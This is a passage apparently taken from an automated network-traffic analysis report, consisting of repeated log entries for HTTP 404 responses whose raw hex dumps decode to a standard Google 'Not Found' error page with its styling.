70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:15:50 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:15:52 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:15:52 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:15:54 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:15:55 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:15:56 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 